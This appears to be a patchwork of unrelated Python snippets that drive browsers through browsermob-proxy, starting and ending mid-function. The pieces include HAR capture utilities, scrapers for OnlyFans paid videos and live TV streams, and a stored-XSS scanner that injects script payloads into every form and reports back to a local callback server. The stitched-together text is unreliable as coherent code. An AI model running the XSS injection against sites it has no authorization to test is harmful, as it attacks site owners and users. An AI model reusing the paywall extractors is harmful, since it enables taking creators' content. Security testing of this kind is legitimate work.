            response_url, har_entries)
        third_party_libs_result = analyze_third_party_libs(third_party_libs)
        result = SuccessResult(
            site=site,
            timestamp=datetime.datetime.now(),
            http_redirection_result=http_redirection_result,
            tls_result=tls_result,
            hsts_result=hsts_result,
            hpkp_result=hpkp_result,
            x_content_type_options_result=x_content_type_options_result,
            x_xss_protection_result=x_xss_protection_result,
            x_frame_options_result=x_frame_options_result,
            x_download_options_result=x_download_options_result,
            expect_ct_result=expect_ct_result,
            cookie_security_result=cookie_security_result,
            cors_policy_result=cors_policy_result,
            cors_result=cors_result,
            csp_result=csp_result,
            csrf_result=csrf_result,
            referrer_policy_result=referrer_policy_result,
            cache_control_result=cache_control_result,
            leaking_server_software_info_result=
            leaking_server_software_info_result,
            mixed_content_result=mixed_content_result,
            sri_result=sri_result,
            cross_domain_existence_result=cross_domain_existence_result,
            third_party_libs_result=third_party_libs_result)
    except Exception as e:
        # Any failure anywhere in the pipeline is folded into an
        # ErrorResult rather than propagated.
        result = ErrorResult(site=site,
                             timestamp=datetime.datetime.now(),
                             error_msg=str(e))
    return result
class Fetcher:
    """Fetches a page through a BrowserMob proxy (local or remote) with a
    Selenium webdriver and returns the HAR plus the rendered DOM."""

    def __init__(self):
        self.server = None
        self.proxy = None
        self.browser = None
        self.driver = None

    def set_remote_server(self, host, port):
        """Defines an already running proxy server for gathering includes
        and content.
        """
        self.server = RemoteServer(host, port)
        self.proxy = self.server.create_proxy()

    def start_local_server(self, binpath=None):
        """Starts a local instance of BrowserMob.

        Keyword Arguments:
        binpath -- The full path, including the binary name to the
                   browsermob-proxy binary.
        """
        if binpath is None:
            binpath = "{0}/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy".format(getcwd())
        self.server = Server(binpath)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def set_firefox(self):
        """Sets the Webdriver for Firefox"""
        self.profile = webdriver.FirefoxProfile()
        self.profile.set_proxy(self.proxy.selenium_proxy())
        self.driver = webdriver.Firefox(firefox_profile=self.profile)

    def run(self, site, name='fetch'):
        """Runs an instance of the Fetcher. Requires that either
        set_remote_server() or start_local_server() has been previously
        called.

        Keyword Arguments:
        site -- The URL of the site to load.
        name -- Name of the resulting HAR.

        Returns the HAR dict with the page source attached under 'dom'.
        """
        try:
            self.proxy.headers({'Via': None})  # TODO: Need to override BrowserMob to remove the Via Header - https://github.com/lightbody/browsermob-proxy/issues/213
            self.proxy.new_har(name, options={
                'captureHeaders': True,
                'captureContent': True,
                'captureBinaryContent': True
            })
            self.driver.get(site)
            har = self.proxy.har
            har['dom'] = self.driver.page_source
            return har
        except AttributeError:
            # self.driver is still None when no webdriver was configured.
            print "[!] FAILED: Ensure you have set a Webdriver"

    def close(self):
        """Best-effort teardown of proxy and driver."""
        try:
            # NOTE(review): presumably the proxy client exposes stop() in
            # the browsermobproxy version this targets — confirm; newer
            # clients name this close().
            self.proxy.stop()  # The proxy won't need to be stopped if using remote_server()
        except AttributeError:
            pass
        try:
            self.driver.close()
        except AttributeError:
            print '[!] Driver not found'
def _real_extract(self, url):
    """Extract video entries for one OnlyFans post: drive the page in a
    browser behind a per-call BrowserMob proxy and read the post's JSON
    out of the captured HAR."""
    try:
        # Allocate a server port under the class lock: ports step by 100
        # per instance; if a candidate port is already listening, try the
        # next one, giving up after 25 attempts.
        with OnlyFansPostIE._LOCK:
            while True:
                _server_port = 18080 + 100 * OnlyFansPostIE._NUM
                _server = Server(
                    path=
                    "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy",
                    options={'port': _server_port})
                if _server._is_listening():
                    OnlyFansPostIE._NUM += 1
                    if OnlyFansPostIE._NUM == 25:
                        raise Exception("mobproxy max tries")
                else:
                    # Discard the server's own logging.
                    _server.start({'log_path': '/dev', 'log_file': 'null'})
                    OnlyFansPostIE._NUM += 1
                    break
        # Proxy listens one port above the server's REST port.
        _host = 'localhost'
        _port = _server_port + 1
        _harproxy = _server.create_proxy({'port': _port})
        # NOTE(review): if Server()/create_proxy/get_driver raise before
        # these names are bound, the finally block below hits
        # NameError on _harproxy/driver — confirm intended.
        driver = self.get_driver(host=_host, port=_port)
        # Prime the session cookies before hitting the post URL.
        self.send_driver_request(driver, self._SITE_URL)
        for cookie in OnlyFansPostIE._COOKIES:
            driver.add_cookie(cookie)
        self.report_extraction(url)
        post, account = re.search(self._VALID_URL,
                                  url).group("post", "account")
        self.to_screen("post:" + post + ":" + "account:" + account)
        entries = {}
        # Capture response bodies (not headers) under a per-post HAR ref.
        _harproxy.new_har(options={
            'captureHeaders': False,
            'captureContent': True
        }, ref=f"har_{post}", title=f"har_{post}")
        self.send_driver_request(driver, url)
        res = self.wait_until(driver, 30, error404_or_found())
        if not res or res[0] == "error404":
            raise ExtractorError("Error 404: Post doesnt exists")
        har = _harproxy.har
        # The post's API response is located inside the HAR by URL.
        data_json = self.scan_for_request(har, f"har_{post}",
                                          f"/api2/v2/posts/{post}")
        if data_json:
            self.write_debug(data_json)
            _entry = self._extract_from_json(data_json,
                                             user_profile=account)
            if _entry:
                # Deduplicate by video id, keeping the longest variant.
                for _video in _entry:
                    if not _video['id'] in entries.keys():
                        entries[_video['id']] = _video
                    else:
                        if _video['duration'] > entries[
                                _video['id']]['duration']:
                            entries[_video['id']] = _video
        if entries:
            return self.playlist_result(list(entries.values()),
                                        "Onlyfans:" + account,
                                        "Onlyfans:" + account)
        else:
            raise ExtractorError("No entries")
    except ExtractorError as e:
        # Already well-typed — propagate unchanged.
        raise
    except Exception as e:
        # Wrap anything unexpected with its traceback for the screen log.
        lines = traceback.format_exception(*sys.exc_info())
        self.to_screen(f'{repr(e)} \n{"!!".join(lines)}')
        raise ExtractorError(repr(e))
    finally:
        # Always release the proxy, the server, and the webdriver.
        _harproxy.close()
        _server.stop()
        self.rm_driver(driver)
def _real_extract(self, url):
    """Extract all purchased ("paid") OnlyFans videos for the logged-in user.

    Spins up a dedicated browsermob-proxy, records a HAR while Selenium
    navigates to the "purchased" tab and scrolls the post list, then scans
    the HAR for the users/list and posts/paid API responses to build a
    deduplicated playlist (longest variant wins per video id).

    Raises ExtractorError when no entries are found or on any unexpected
    failure (re-wrapped with a traceback dump to screen).
    """
    # Pre-bind cleanup targets so the finally block never hits NameError
    # when setup fails partway (the original dereferenced them blindly).
    _server = _harproxy = driver = None
    try:
        self.report_extraction(url)
        # Port allocation is serialized via the class lock.
        with OnlyFansPaidlistIE._LOCK:
            _server_port = 18080 + 100 * OnlyFansPaidlistIE._NUM
            OnlyFansPaidlistIE._NUM += 1
            _server = Server(
                path=
                "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy",
                options={'port': _server_port})
            _server.start({'log_path': '/dev', 'log_file': 'null'})
        _host = 'localhost'
        # Convention: the HAR proxy listens on server port + 1.
        # (The original assigned _host = 'localhost' twice; duplicate removed.)
        _port = _server_port + 1
        _harproxy = _server.create_proxy({'port': _port})
        driver = self.get_driver(host=_host, port=_port)
        # Content capture is required to read JSON API bodies from the HAR.
        _harproxy.new_har(options={
            'captureHeaders': False,
            'captureContent': True
        },
                          ref="har_paid",
                          title="har_paid")
        # First visit establishes the domain so cookies can be added, then
        # reload with the session cookies applied.
        self.send_driver_request(driver, self._SITE_URL)
        for cookie in OnlyFansPaidlistIE._COOKIES:
            driver.add_cookie(cookie)
        self.send_driver_request(driver, self._SITE_URL)
        # Click the "purchased" tab (site may be localized: EN or ES).
        list_el = self.wait_until(
            driver, 60,
            ec.presence_of_all_elements_located(
                (By.CLASS_NAME, "b-tabs__nav__item")))
        for el in list_el:
            if re.search(r'(?:purchased|comprado)',
                         el.get_attribute("textContent").lower()):
                el.click()
                break
        self.wait_until(
            driver, 60,
            ec.presence_of_element_located((By.CLASS_NAME, "user_posts")))
        # Scroll to the bottom so every paid post's API request is captured.
        self.wait_until(driver, 600, scroll(10))
        har = _harproxy.har
        # Map user id -> username from the users/list API responses; fall
        # back to a hard-coded map when the request was not observed.
        users_json = self.scan_for_all_requests(har, "har_paid",
                                                r'/api2/v2/users/list')
        if users_json:
            self.to_screen("users list attempt success")
            users_dict = dict()
            for _users in users_json:
                for user in _users.keys():
                    users_dict.update(
                        {_users[user]['id']: _users[user]['username']})
        else:
            self.to_screen("User-dict loaded manually")
            users_dict = dict()
            users_dict.update({
                127138: 'lucasxfrost',
                1810078: 'sirpeeter',
                5442793: 'stallionfabio',
                7820586: 'mreyesmuriel'
            })
        self.to_screen(users_dict)
        entries = {}
        _reg_str = r'/api2/v2/posts/paid\?'
        data_json = self.scan_for_all_requests(har, "har_paid", _reg_str)
        if data_json:
            self.write_debug(data_json)
            list_json = []
            for el in data_json:
                list_json += el['list']
            for info_json in list_json:
                for _video in self._extract_from_json(info_json,
                                                      users_dict=users_dict):
                    # Deduplicate by video id, keeping the longest variant.
                    if not _video['id'] in entries.keys():
                        entries[_video['id']] = _video
                    else:
                        if _video.get('duration', 1) > entries[
                                _video['id']].get('duration', 0):
                            entries[_video['id']] = _video
        if entries:
            return self.playlist_result(list(entries.values()),
                                        "Onlyfans:paid", "Onlyfans:paid")
        else:
            raise ExtractorError("no entries")
    except ExtractorError as e:
        raise
    except Exception as e:
        lines = traceback.format_exception(*sys.exc_info())
        self.to_screen(f'{repr(e)} \n{"!!".join(lines)}')
        raise ExtractorError(repr(e))
    finally:
        # Release resources only if they were actually created.
        if _harproxy is not None:
            _harproxy.close()
        if _server is not None:
            _server.stop()
        if driver is not None:
            self.rm_driver(driver)
def stream_collector():
    """Capture the TVM live-stream m3u8 URL via browsermob-proxy and headless Chrome.

    Starts a recording proxy, loads the embedded player page, clicks the play
    button, then scans the recorded HAR for a high-quality chunklist m3u8 URL
    and hands it to save_stream().
    """
    server = Server("/root/xhprof/browsermob-proxy-2.1.4/bin/browsermob-proxy")
    server.start()
    proxy = server.create_proxy()

    chrome_options = Options()
    # Avoid the bug "DevToolActivePort file doesn't exist"
    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--disable-dev-shm-usage')
    # Use headless browser to implement web automation
    chrome_options.add_argument('--headless')
    chrome_options.add_argument('--ignore-certificate-errors')
    # Route all browser traffic through the recording proxy.
    chrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy))

    # Turn on the chrome driver
    chrome_driver = "/usr/bin/chromedriver"
    driver = webdriver.Chrome(executable_path=chrome_driver,
                              chrome_options=chrome_options)

    # Provide the url of the target website
    # The link is found in the source code of the website and it is embedded in a static page
    base_url = "https://media.tvm.com.mt/16958960.ihtml/player.html?source=embed&live_id=16966825&tvm_location=tvm1_live"
    try:
        proxy.new_har("tvm.com.mt/mt/live",
                      options={
                          'captureHeaders': True,
                          'captureContent': True
                      })
        driver.get(base_url)
        print("Connecting to the website(TVM)...")
        # Locate the corresponding element of the button and click it.
        # No visible browser is available, so clicking the play button
        # programmatically is what triggers the live-stream requests.
        driver.find_element_by_xpath("//*[@class='big-play-button']").click()
        time.sleep(5)
        print("Click the button!")
        time.sleep(5)
        result = proxy.har
        for entry in result['log']['entries']:
            _url = entry['request']['url']
            # Filter the urls based on "m3u8" and "chunklist" because we aim
            # to find the stream which is in high quality.
            if "m3u8" in _url and "chunklist" in _url:
                print("Congrats! The live stream is shown in the following!")
                print(_url)
                # Save the stream
                save_stream(_url)
                break
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are not swallowed. Some errors happened or it took too much time.
        print("Sorry, it's not working!")
    finally:
        # Always release the proxy server and the browser. The original only
        # cleaned up on a match or an exception, leaking both whenever the
        # HAR contained no chunklist m3u8 URL.
        server.stop()
        driver.quit()
def get_viedo_downURL(self, cursor): print("开始请求资源网站") # 建立browsermobproxy服务, 需指定browsermob-proxy, 类似chromedriver server = Server( "D:/下载/browsermob-proxy-2.1.4/bin/browsermob-proxy.bat") server.start() # 创建代理 proxy = server.create_proxy() chrome_options = Options() # 为chrome启动时设置代理 chrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy)) # 静默模式, 不显示浏览器 chrome_options.add_argument('headless') driver = webdriver.Chrome( executable_path= 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe', chrome_options=chrome_options) # driver.set_script_timeout(3) # 这设置了要记录的新HAR(HTTP Archive format(HAR文件),是用来记录浏览器加载网页时所消耗的时间的工具) proxy.new_har(ref="HAR啦", options={ 'captureHeaders': True, 'captureContent': True }, title="标题") driver.get(self.url) title = driver.title torrentName = ''.join(re.findall(r'[A-Za-z]+-\d+', title)).replace('-', '_') # 获取HAR result = proxy.har print(result) # m3u8UrlSet = set() # 把爬取的链接和标题存入数据库 cursor.execute( "CREATE TABLE IF NOT EXISTS torrent(id INTEGER PRIMARY KEY AUTOINCREMENT, title VARCHAR(255) NOT NULL, fileUrl VARCHAR(255) NOT NULL, isGet INT NOT NULL);" ) for entry in result['log']['entries']: _url = entry['request']['url'] # 根据URL找到数据接口 if "m3u8" in _url: print("找到M3U8文件了") print(_url) cursor.execute( "INSERT INTO torrent(id, title, fileUrl, isGet) VALUES (?, ?, ?, ?);", (None, title, _url, 0)) # m3u8UrlSet.add(_url) return torrentName # 判断响应是否存在error if "_error" in entry['response'].keys(): print("Url : {} 响应报错信息为 error : {}".format( _url, entry["response"]["_error"])) # print(m3u8UrlSet) # 代理需要关闭 print("已经要关闭啦!!!!") server.stop() driver.quit() return torrentName
class performance(object):
    #create performance data
    # Python 2 helper: records a page load through browsermob-proxy and dumps
    # both the HAR and the browser's window.performance object to JSON files.

    def __init__(self, mob_path):
        #initialize
        # mob_path: filesystem path to the browsermob-proxy launcher binary.
        from datetime import datetime
        print "%s: Go " % (datetime.now())
        self.browser_mob = mob_path
        self.server = self.driver = self.proxy = None

    @staticmethod
    def __store_into_file(args, title, result):
        #store data collected into file
        # Writes <title>.json either into args['path'] (when given) or the
        # current working directory.
        if 'path' in args:
            har_file = open(args['path'] + '/' + title + '.json', 'w')
        else:
            har_file = open(title + '.json', 'w')
        har_file.write(str(result))
        har_file.close()

    def __start_server(self):
        #prepare and start server
        # Launches browsermob-proxy and creates the recording proxy.
        self.server = Server(self.browser_mob)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def __start_driver(self, args):
        #prepare and start driver
        # args['browser'] selects the engine; Chrome is pointed at the proxy
        # via --proxy-server, Firefox via a profile-level proxy.
        #chromedriver
        if args['browser'] == 'chrome':
            print "Browser: Chrome"
            print "URL: {0}".format(args['url'])
            chromedriver = os.getenv("CHROMEDRIVER_PATH", "/chromedriver")
            os.environ["webdriver.chrome.driver"] = chromedriver
            # proxy.proxy is host:port; .path of the parse keeps that string.
            url = urlparse.urlparse(self.proxy.proxy).path
            chrome_options = webdriver.ChromeOptions()
            chrome_options.add_argument("--proxy-server={0}".format(url))
            chrome_options.add_argument("--no-sandbox")
            self.driver = webdriver.Chrome(chromedriver,
                                           chrome_options=chrome_options)
        #firefox
        if args['browser'] == 'firefox':
            print "Browser: Firefox"
            profile = webdriver.FirefoxProfile()
            profile.set_proxy(self.proxy.selenium_proxy())
            self.driver = webdriver.Firefox(firefox_profile=profile)

    def start_all(self, args):
        #start server and driver
        self.__start_server()
        self.__start_driver(args)

    def create_har(self, args):
        #start request and parse response
        # Records the HAR for args['url'] and dumps it plus the browser's
        # window.performance timings to 'har.json' / 'perf.json'.
        self.proxy.new_har(args['url'], options={'captureHeaders': True})
        self.driver.get(args['url'])
        result = json.dumps(self.proxy.har, ensure_ascii=False)
        self.__store_into_file(args, 'har', result)
        performance = json.dumps(
            self.driver.execute_script("return window.performance"),
            ensure_ascii=False)
        self.__store_into_file(args, 'perf', performance)

    def stop_all(self):
        #stop server and driver
        from datetime import datetime
        print "%s: Finish" % (datetime.now())
        self.server.stop()
        self.driver.quit()
class BrowserMobLibrary():
    """Robot Framework keyword library wrapping a browsermob-proxy server.

    Manages one server process and any number of proxies; most keywords
    delegate to the currently active proxy.
    """
    ROBOT_LIBRARY_SCOPE = 'GLOBAL'
    ROBOT_LIBRARY_VERSION = VERSION

    def __init__(self):
        self.isServerStarted = False
        self.activeProxy = None
        self.server = None
        self.proxies = []

    def _proxy(self):
        """Return the active proxy, or raise if none has been created."""
        if self.activeProxy is None:
            raise Exception("No proxy has been created")
        return self.activeProxy

    def start_browsermob(self, browsermob_path):
        """Launch the browsermob-proxy server from the given binary path."""
        self.server = Server(browsermob_path)
        self.server.start()
        self.isServerStarted = True

    def stop_browsermob(self):
        """Stop the server and forget it."""
        self.server.stop()
        self.server = None
        self.isServerStarted = False

    def create_proxy(self):
        """Create a new proxy, make it active, track it, and return it.

        Bug fix: the original assigned the *unbound method*
        ``self.server.create_proxy`` (missing call parentheses) as the
        active proxy and appended that method object to ``self.proxies``,
        then returned a *different* proxy from a second call — so the
        active proxy was never a usable proxy object. Create exactly one
        proxy and use it consistently.
        """
        self.activeProxy = self.server.create_proxy()
        self.proxies.append(self.activeProxy)
        return self.activeProxy

    def close_proxy(self, proxy):
        """Close the given proxy and stop tracking it."""
        self.proxies.remove(proxy)
        proxy.close()

    def close_active_proxy(self):
        """Close the currently active proxy."""
        self.close_proxy(self.activeProxy)

    def set_active_proxy(self, proxy):
        """Make `proxy` the target of subsequent proxy keywords."""
        self.activeProxy = proxy

    def get_active_proxy(self):
        """Return the currently active proxy (may be None)."""
        return self.activeProxy

    def get_all_proxies(self):
        """Return the list of all proxies created by this library."""
        return self.proxies

    def close_all_proxies(self):
        """Close every tracked proxy (the list itself is left as-is)."""
        for proxy in self.proxies:
            proxy.close()

    def capture_traffic(self, reference=None, **options):
        """Start a new HAR capture on the active proxy."""
        return self._proxy().new_har(reference, options)

    def get_captured_traffic(self):
        """Return the HAR captured so far."""
        return self._proxy().har

    def set_capture_reference(self, reference=None):
        """Start a new page within the current HAR."""
        return self._proxy().new_page(reference)

    def ignore_all_traffic_matching(self, regexp, status_code):
        """Blacklist URLs matching `regexp`, answering with `status_code`."""
        return self._proxy().blacklist(regexp, status_code)

    def only_capture_traffic_matching(self, regexp, status_code):
        """Whitelist URLs matching `regexp`; others get `status_code`."""
        return self._proxy().whitelist(regexp, status_code)

    def use_basic_authentication(self, domain, username, password):
        """Configure HTTP basic auth for `domain` on the active proxy."""
        return self._proxy().basic_authentication(domain, username, password)

    def set_headers(self, headers):
        """Add/override request headers on the active proxy."""
        return self._proxy().headers(headers)

    def set_response_interceptor(self, js):
        """Install a JavaScript response interceptor."""
        return self._proxy().response_interceptor(js)

    def set_request_interceptor(self, js):
        """Install a JavaScript request interceptor."""
        return self._proxy().request_interceptor(js)

    def set_bandwith_limits(self, **options):
        """Apply bandwidth/latency limits to the active proxy."""
        return self._proxy().limits(options)

    def set_proxy_timeouts(self, **options):
        """Configure proxy timeouts."""
        return self._proxy().timeouts(options)

    def remap_hosts(self, address, ip_address):
        """Remap a hostname to a fixed IP address."""
        return self._proxy().remap_hosts(address, ip_address)

    def wait_for_traffic_to_stop(self, quiet_period, timeout):
        """Block until traffic is quiet for `quiet_period` or `timeout` hits."""
        return self._proxy().wait_for_traffic_to_stop(quiet_period, timeout)

    def clear_proxy_dns_cache(self):
        """Clear the proxy's DNS cache."""
        return self._proxy().clear_dns_cache()

    def rewrite_url(self, match, replace):
        """Rewrite request URLs matching `match` to `replace`."""
        return self._proxy().rewrite_url(match, replace)
class StoredXSSDetector:
    """Stored-XSS scanner.

    Workflow (see exec()): submit random marker strings into every known
    form, crawl the site to bind forms to the pages that echo them, start a
    local callback HTTP server, re-submit the forms with script payloads
    that phone home to that server, then report every (form, field, url)
    triple whose payload executed.
    """

    def __init__(self, results, reports, **kwargs):
        # results: crawl output containing 'requests' (forms) and 'urls'.
        # reports: shared list this detector appends its report dict to.
        self.results = results
        self.reports = reports
        self.args = kwargs
        # Marker = fixed random prefix (factor) + per-field random suffix.
        self.factor_length = 6
        self.factor = randstr(self.factor_length)
        self.rand_length = 10
        self.listen_port = 9759
        self.filled_forms = {}
        # marker string -> (form uuid, field name)
        self.str_mapping = {}
        # (form uuid, field name) -> url where the marker was echoed
        self.bindings = {}
        self.lock = threading.Lock()
        self.vulnerable = []
        self.server = None
        self.cookies = {}
        # Parse the raw "k=v; k2=v2" cookie header into a dict.
        for entry in self.args['cookie'].split(';'):
            if entry.find('=') == -1:
                continue
            key, value = entry.strip().split('=', 1)
            self.cookies[key] = value
        # Create proxy server
        logging.info('Starting browsermobproxy server...')
        self.proxy_server = Server(self.args['browsermobproxy'])
        self.proxy_server.start()
        self.proxy = self.proxy_server.create_proxy()
        logging.info('Browsermobproxy server started')
        # Create Chrome engine
        logging.info('Creating Selenium Chrome webdriver...')
        self.chrome_options = webdriver.ChromeOptions()
        self.chrome_options.add_argument('--proxy-server={}'.format(
            self.proxy.proxy))
        if 'headless' in self.args:
            self.chrome_options.add_argument('--headless')
            self.chrome_options.add_argument('--disable-gpu')
            self.chrome_options.add_argument("--disable-extensions")
        self.driver = webdriver.Chrome(chrome_options=self.chrome_options)
        logging.info('Selenium Chrome webdriver created')

    @staticmethod
    def meta():
        # Plugin metadata for the host framework.
        return {'name': 'Stored XSS Detector for all', 'version': '1.0'}

    def random_form(self):
        """Submit every known form with random marker values in its text fields."""
        logging.info('Start sending random payload')
        for uuid in self.results['requests']:
            logging.info('Processing form {}'.format(uuid))
            request = self.results['requests'][uuid]
            if request['content-type'] == 'text/plain':
                logging.warning('Form {} is text/plain. Skipped'.format(uuid))
                continue
            params = {}
            self.filled_forms[request['uuid']] = {}
            r = None
            for name in request['fields']:
                field = request['fields'][name]
                if field['type'] in ['text', 'password', 'textarea']:
                    # Marker value: remember which form/field produced it.
                    params[name] = self.factor + randstr(self.rand_length)
                    self.filled_forms[request['uuid']][name] = params[name]
                    self.str_mapping[params[name]] = (request['uuid'], name)
                elif field['type'] == 'radio':
                    params[name] = field['values'][0]
                elif field['type'] == 'checkbox':
                    params[name] = field['value']
                else:
                    params[name] = field['default']
            if request['method'] == 'GET':
                r = requests.get(request['url'],
                                 params=params,
                                 cookies=self.cookies)
            elif request['method'] == 'POST':
                if request[
                        'content-type'] == 'application/x-www-form-urlencoded':
                    r = requests.post(request['url'],
                                      data=params,
                                      cookies=self.cookies)
                elif request['content-type'] == 'multipart/form-data':
                    r = requests.post(request['url'],
                                      files=params,
                                      cookies=self.cookies)
            # NOTE(review): r stays None for unsupported method/content-type
            # combinations, which would make r.status_code raise — confirm
            # upstream guarantees one of the handled cases.
            if r.status_code not in [200, 301, 302, 306, 307, 308]:
                del self.filled_forms[request['uuid']]
                logging.warning('Failed to send form {}'.format(uuid))
            logging.info('Form {} sent successfully'.format(uuid))

    def bind_form(self):
        """Crawl all known urls looking for echoed markers; record bindings."""
        logging.info('Start binding urls with forms')
        for url in self.results['urls']:
            logging.info('Crawling {}'.format(url))
            r = requests.get(url, cookies=self.cookies)
            text = r.text
            pos = text.find(self.factor)
            while pos != -1:
                # Slice out prefix+suffix and look it up in the marker map.
                rand = text[pos:pos + self.factor_length + self.rand_length]
                if rand in self.str_mapping:
                    logging.info('Found a binding in {}'.format(url))
                    self.bindings[self.str_mapping[rand]] = url
                pos = text.find(self.factor,
                                pos + self.factor_length + self.rand_length)

    def start_server(self):
        """Start the local HTTP callback server the XSS payloads report to."""
        class Handler(BaseHTTPRequestHandler):
            # `s` is the handler instance; `self` (closure) is the detector.
            def do_GET(s):
                query = parse_qs(urlparse(s.path).query)
                if 'uuid' in query and 'name' in query:
                    # vulnerable[] is shared with the main thread.
                    self.lock.acquire()
                    try:
                        pair = (query['uuid'][0], query['name'][0],
                                query['url'][0])
                        if pair not in self.vulnerable:
                            self.vulnerable.append(pair)
                    finally:
                        self.lock.release()
                s.send_response(200)
                s.send_header('Content-Type', 'text/html')
                s.end_headers()
                s.wfile.write(b'')

        def start_server():
            logging.info('Starting monitor server at port {}...'.format(
                self.listen_port))
            self.server.serve_forever()

        self.server = HTTPServer(('127.0.0.1', self.listen_port), Handler)
        t = threading.Thread(target=start_server, daemon=True)
        t.start()
        # Give the server a moment to come up before payloads fire.
        time.sleep(3)

    def send_payload(self):
        """Re-submit each bound form with real XSS payloads and visit the page."""
        logging.info('Start to send payload')
        for info in self.bindings:
            url = self.bindings[info]
            request = self.results['requests'][info[0]]
            logging.info('Testing payload for form {}'.format(info[0]))
            params = {}
            for name in request['fields']:
                field = request['fields'][name]
                if name == info[1]:
                    # Build the phone-home script and sandwich it between
                    # the base64-encoded payload fragments.
                    script = script_template.format(self.listen_port,
                                                    info[0], info[1])
                    params[name] = \
                        base64.b64decode(xss_payload[0]).decode('utf-8') + script + \
                        base64.b64decode(xss_payload[1]).decode('utf-8') + script + \
                        base64.b64decode(xss_payload[2]).decode('utf-8')
                elif field['type'] == 'radio':
                    params[name] = field['values'][0]
                elif field['type'] == 'checkbox':
                    params[name] = field['value']
                else:
                    params[name] = field['default']
            r = None
            if request['method'] == 'GET':
                r = requests.get(request['url'],
                                 params=params,
                                 cookies=self.cookies)
            elif request['method'] == 'POST':
                if request[
                        'content-type'] == 'application/x-www-form-urlencoded':
                    r = requests.post(request['url'],
                                      data=params,
                                      cookies=self.cookies)
                elif request['content-type'] == 'multipart/form-data':
                    r = requests.post(request['url'],
                                      files=params,
                                      cookies=self.cookies)
            if r.status_code not in [200, 301, 302, 306, 307, 308]:
                continue
            # Load the bound page in the browser so any stored payload runs.
            self.driver.get(url)
            # Make sure the browser session carries the same cookies; reload
            # after fixing any mismatch.
            for key in self.cookies:
                exist = self.driver.get_cookie(key)
                if exist is not None and exist['value'] != self.cookies[key]:
                    self.driver.add_cookie({
                        'name': key,
                        'value': self.cookies[key]
                    })
                    self.driver.get(url)

    def stop_server(self):
        """Shut down the callback HTTP server."""
        self.server.shutdown()
        logging.info('The monitoring server has been closed')

    def make_report(self):
        """Append a report dict summarizing every confirmed injection point."""
        def make_entry(v):
            # v = (form uuid, field name, url where the payload fired)
            request = self.results['requests'][v[0]]
            return [
                request['location'], request['url'], request['method'], v[1],
                html.escape(v[2])
            ]

        self.reports.append({
            'title':
            'Stored XSS Injection Points',
            'overview':
            'Found {} Stored XSS injection point(s)'.format(
                len(self.vulnerable)),
            'header':
            ['Form Location', 'Target', 'Method', 'Name', 'XSS Location'],
            'entries':
            list(map(make_entry, self.vulnerable))
        })

    def exec(self):
        """Run the full detection pipeline and tear everything down."""
        logging.info('Start to test stored XSS points')
        if 'requests' not in self.results:
            logging.fatal('There\'s no requests in results')
            raise NoRequestsException
        self.random_form()
        self.bind_form()
        self.start_server()
        self.send_payload()
        self.stop_server()
        self.make_report()
        logging.info('Stopping proxy server and Chrome webdriver...')
        self.proxy.close()
        self.proxy_server.stop()
        self.driver.stop_client()
        self.driver.close()
        logging.info('Proxy server and Chrome webdriver have been closed')
def main(argv): init() parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='start_url', help='Set page URL', required=True) parser.add_argument('-c', action='store', dest='cookies_file', help='JSON file with cookies', required=False) parser.add_argument( '-w', action='store', dest='webdriver_type', help='Set WebDriver type (firefox or phantomjs, firebox by default)', default="firefox", required=False) results = parser.parse_args() start_url = results.start_url cookies_file = results.cookies_file webdriver_type = results.webdriver_type allowed_domain = urlparse(start_url).netloc browsermobproxy_path = get_browsermobproxy_path() options = { 'port': 9090, } server = Server(browsermobproxy_path, options) server.start() proxy = server.create_proxy() if webdriver_type == "phantomjs": service_args = [ '--proxy=localhost:9091', '--proxy-type=http', ] driver = webdriver.PhantomJS(service_args=service_args) driver.set_window_size(1440, 1024) else: profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har('woodpycker', options={ 'captureHeaders': True, 'captureContent': True }) driver.get(start_url) if not cookies_file is None: with open(cookies_file, 'rb') as fp: cookies = json.load(fp) for cookie in cookies: driver.add_cookie(cookie) driver.refresh() links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0, lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % ( Fore.BLUE + "*" + Fore.RESET, Style.BRIGHT + text + Style.RESET_ALL, Style.BRIGHT + url + Style.RESET_ALL) show_status_codes(proxy.har, allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
class Browser:
    """Chrome wrapped behind browsermob-proxy: fetch a page, scroll it to
    force lazy content, and write one HAR file per fetch into harfilePath."""

    def __init__(self, chromedriverPath, browsermobPath, harfilePath,
                 cookies=None):
        # chromedriverPath: chromedriver binary; browsermobPath: browsermob
        # launcher; harfilePath: directory that receives <timestamp>.har files;
        # cookies: optional path to a JSON cookie list to preload.
        self.harfilePath = harfilePath
        self.server = Server(browsermobPath)
        self.server.start()
        self.proxy = self.server.create_proxy()
        os.environ["webdriver.chrome.driver"] = chromedriverPath
        # NOTE(review): proxy.proxy is "host:port"; urlparse(...).path keeps
        # that whole string since there is no scheme — presumably intentional
        # as the --proxy-server value. Confirm.
        url = urlparse(self.proxy.proxy).path
        chrome_options = webdriver.ChromeOptions()
        chrome_options.add_argument("--proxy-server={0}".format(url))
        self.driver = webdriver.Chrome(chromedriverPath,
                                       chrome_options=chrome_options)
        if cookies:
            print("Loading cookies from " + str(cookies))
            with open(cookies, 'r') as cookieFile:
                cookieJson = json.loads(cookieFile.read())
                for cookie in cookieJson:
                    self.driver.add_cookie(cookie)

    def get(self, url, timeout=20):
        """Fetch `url`, scroll down in steps to trigger lazy loading, save the
        recorded HAR, and return the page source.

        On a page-load timeout the load is aborted (ESC) and the partial page
        is used; if reading the source itself times out, retries recursively
        with the timeout increased by 5 seconds.
        """
        print(url)
        self.proxy.new_har(url, {"captureContent": True})
        try:
